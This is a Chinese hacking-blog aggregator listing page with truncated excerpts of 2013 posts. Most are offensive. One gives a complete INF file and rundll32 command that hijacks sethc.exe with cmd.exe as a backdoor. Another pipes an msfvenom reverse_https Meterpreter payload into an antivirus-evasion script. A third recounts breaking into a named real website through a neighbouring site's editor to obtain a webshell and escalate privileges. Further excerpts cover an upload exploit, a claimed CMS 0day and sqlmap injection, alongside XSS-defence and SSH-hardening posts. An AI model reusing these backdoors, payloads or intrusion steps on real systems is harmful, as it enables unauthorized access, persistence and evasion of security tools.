记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

几种极其隐蔽的XSS注入的防护(转)

XSS注入的本质就是: 某网页中根据用户的输入, 不期待地生成了可执行的js代码, 并且js得到了浏览器的执行. 意思是说, 发给浏览器的字符串中, 包含了一段非法的js代码, 而这段代码跟用户的输入有关. 常见的XSS注入防护, 可以通过简单的 htmlspecialchars(转义HTML特殊字符), strip_tags(清除HTML标签) 来解决, 但是, 还有一些隐蔽的XSS注入不能通过这两个方法来解决, 而且, 有时业务需要不允许清除HTML标签和特殊字符. 下面列举几种隐蔽的XSS注入方法: IE6/7 UTF7 XSS 漏洞攻击 隐蔽指数: 5 伤害指数: 5 这个漏洞非常隐蔽, 因为它让出现漏洞的网页看起来只有英文字母(ASCII字符), 并没有非法字符, htmlspecialchars 和
发布时间:2013-04-02 17:35 | 阅读:137287 | 评论:0 | 标签:网络技术 XSS 注入 隐蔽 xss

渗透东方神起官网纪实(转)

渗透东方神起官网纪实 写这篇文章只是提供一个思路,不含其他任何装逼成分~ 东方神起中文网:www.tvxqlover.com 话说某天好基友神经错位突然想给东方神起挂上页面,以悼念昔日被甩之情。。。 于是丫就自己先去收集了一下网站信息,服务器是一台美国的IDC,windows2003,iis6.0,上面挂着大概九十多个网站。 目标站整站是个DZ6.0的论坛,一般碰到DZ的试过EXP不行的话就该绕道了。 接着好基友找到了一个支持ASPX的旁站进入旁站后台后,由我通过ewebeditor拿到了webshell。于是开始了星外的提权之旅~ 旁站支持asp,php,aspx。 目录权限和组件配置的很死,导致权限非常的低。一般IDC都这样。 对网站目录有读写权限。temp有读写权限,不过没执行权。wscript.shel
发布时间:2013-02-28 18:15 | 阅读:85177 | 评论:0 | 标签:网络技术 官网 渗透

eWebEditorNet漏洞利用

原理:eWebEditorNet/upload.aspx文件 <form id=”myform” method=”post” encType=”multipart/form-data” runat=”server”> <INPUT id=”uploadfile” style=”HEIGHT: 18px” type=”file” size=”28″ name=”uploadfile” runat=”server”> <asp:linkbutton
发布时间:2013-01-24 16:15 | 阅读:135789 | 评论:0 | 标签:网络技术 eWebEditorNet 利用 漏洞

建站之星最新0DAY

//code by helenpublic function save_profile() {       $user_info =@ ParamHolder::get('user', array());//获取数组        if (sizeof($user_info) <= 0) {           $this->assign('json', Toolkit::jsonERR(__('Missing user information!')))
发布时间:2013-01-10 19:45 | 阅读:104346 | 评论:0 | 标签:网络技术 0day 最新 漏洞

inf劫持sethc.exe

[Version] Signature=”$WINDOWS NT$” [DefaultInstall] AddReg=My_AddReg_Name [My_AddReg_Name] HKLM,SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution optionssethc.exe,debugger,0×00000000,c:windowssystem32cmd.exe Command: rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:windowstempname.inf 原创文章,转载请注明: 转载自98hacker's Blog | WtcHack.Co
发布时间:2013-01-10 19:45 | 阅读:115552 | 评论:0 | 标签:网络技术 劫持 后门

Burp Suite Article

Burp Suite 1: Introduction http://kyrionhackingtutorials.com/2012/05/burp-suite-1-introduction-2/ Burp Suite 2: Proxy | Intruder http://kyrionhackingtutorials.com/2012/05/burp-suite-2-proxy-intruder/ Burp Suite 3: Remotely Interception http://kyrionhackingtutorials.com/2012/05/burp-suite-3-remotely-interception/ Burp Suite 4: Repeater http://k
发布时间:2013-01-07 21:24 | 阅读:117383 | 评论:0 | 标签:burpsuite Burp Suite DDoS攻击 代码审计 内网安全 反病毒 社会工程学 网络安全 网络技术 风险

Sqlmap POST型注入

这里举例的是一个登录点存在post型注入 常用的注入工具测试都木有成功 用火狐的Tamper Data插件修改提交 可以看到报错信息 确定注入是存在的 这里用sqlmap测试注入 首先抓包(如burpsuite)获取提交的参数信息保存为post-sql.txt -r 加载这个post request文件 -p 指定可测试的参数 相关: sqlmap使用笔记 http://blog.bug.cx/2012/06/15/sqlmap%e4%bd%bf%e7%94%a8%e7%ac%94%e8%ae%b0/   Related posts: Sqlmap plugin for BurpSuite 如何使用SQLMap绕过WAF sqlmap使用笔记 Related posts: Sqlmap plugin

Antivirus Sandbox Evasion-ultimate-payload.pl

http://funoverip.net/2012/02/antivirus-sandbox-evasion-part1/ $ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 | ./ultimate-payload.pl -t ultimate-payload-template1.exe -o /tmp/payload.exe [*ultimate] Waiting for payload from STDIN [*ultimate] Payload: read (size: 367) [*ultimate] Payload: encode (new size: 1161) [*ul
发布时间:2013-01-07 21:24 | 阅读:117048 | 评论:0 | 标签:metasploit DDoS攻击 msfencode msfpayload 代码审计 内网安全 反病毒 社会工程学

msf the pentest userguide 读书笔记 v2.pdf

http://forum.90sec.org/thread-3381-1-1.html msf_the_pentest_userguide_读书笔记_v2.pdf下载:msf_the_pentest_userguide_读书笔记_v2 作者写得不错  可以多看看 Related posts: Antivirus Sandbox Evasion-ultimate-payload.pl 黑客攻防实验环境部署.pdf 安全防御体系的构建.pdf Related posts: Antivirus Sandbox Evasion-ultimate-payload.pl 黑客攻防实验环境部署.pdf 安全防御体系的构建.pdf

VPS常用安全设置

http://www.2cto.com/Article/201208/147987.html 新手及才接触VPS的朋友们看一下,主要是关于VPS安全方面相关内容的: 一、修改SSH端口 vi /etc/ssh/sshd_config 找到其中的#Port 22(第13行),去掉#,修改成Port 3333 使用如下命令,重启SSH服务,注:以后用新端口登陆。 service sshd restart 二、禁止ROOT登陆 先添加一个新帐号80st ,可以自定义: useradd 80st 给weidao 帐号设置密码: passwd 80st 仍旧是修改/etc/ssh/sshd_config文件,第39行:#PermitRootLogin yes,去掉前面的#,并把yes改成no,然后,重启SSH服务。以后,

高级SSH安全技巧.pdf

高级SSH安全技巧.pdf下载:高级SSH安全技巧 Related posts: msf the pentest userguide 读书笔记 v2.pdf Antivirus Sandbox Evasion-ultimate-payload.pl VPS常用安全设置 Related posts: msf the pentest userguide 读书笔记 v2.pdf Antivirus Sandbox Evasion-ultimate-payload.pl VPS常用安全设置

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云